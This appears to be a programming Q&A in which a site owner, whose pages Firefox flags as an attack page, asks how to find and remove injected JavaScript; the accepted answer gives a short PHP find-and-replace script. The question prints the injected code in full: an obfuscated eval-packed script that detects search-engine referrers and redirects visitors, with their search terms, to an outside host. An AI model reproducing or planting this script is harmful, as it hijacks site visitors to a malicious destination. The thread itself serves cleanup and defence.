# What is the best method to check if files contain certain Javascript code?

Tags: php, regex, search

My sites have been marked as a **Reported Attack Page!** in Firefox.

Here is the suspicious code in question:

```
<script language="JavaScript">eval(function(p,a,c,k,e,r){e=f
unction(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?Strin
g.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,Str
ing)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e
]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.re
place(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('e r=
x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3
("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g"
;4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.
3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c
"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6)
.o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referr
er|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|s
ubstring|split||||||ea|ht|tp|document|||go|window|location'.
split('|'),0,{}))</script>
```

I want to write some PHP code to traverse the folders in the site path and fetch the files in each folder. For each file, I will open it and check if it contain the above code using regular expressions.

Is this good idea, or what should I do here?

Comment: @DOK Be careful man , what is the problem ??

Comment: so, what your saying is, you have code in your pages, and you don't know where it came from? or did you just not bother escaping user submitted content before output?

Comment: @dqhendricks I want to remove this code from my sites now , by checking all files in my web root

Comment: okay, but if you don't understand how it got there, chances are it will come right back after you attempt to get rid of it.

Comment: i will disable my websites now , and check it from shells and back doors ,   then do my test

Answer (score 1, accepted):

You just need to do some string replacement, since you know exactly what you're looking for. Something like this should work (You may need to adjust the call to `glob` depending on where you invoke this script.

```
<?php

$js = 'INSERT THE CODE FROM YOUR POST HERE';
foreach( glob("*") as $filename) {
    $contents = file_get_contents( $filename);
    $contents = str_replace( $js, '', $contents); // Replace the code with nothing
    file_put_contents( $filename, $contents);
}
```